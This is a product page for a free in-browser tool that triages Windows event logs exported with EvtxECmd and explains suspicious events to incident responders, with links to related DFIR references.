Documentation & Tools →
Sign In
Free Interactive Tool

Event Log Triage Analyzer

Paste your EvtxECmd CSV output and instantly see the suspicious events, with the reasoning a responder applies: log clears, off-hours logons, service installs, account creation, PowerShell download cradles, and more. Runs entirely in your browser. Nothing is uploaded.

Export Windows event logs with EvtxECmd, paste the CSV below, and the analyzer flags the high-signal events and explains why each matters and what to check next. No event logs of your own? Load the built-in sample incident, a compromised workstation, and watch the attack story assemble itself.

More free DFIR tools and references

KAPE & EZ Tools Cheatsheet
The full collect-parse-analyze command reference for Windows DFIR.
PowerShell for Security Operations
25+ investigation commands by ATT&CK tactic, with context.
Windows Endpoint Investigation
The full method behind this tool: correlate, reconstruct, and prove what happened.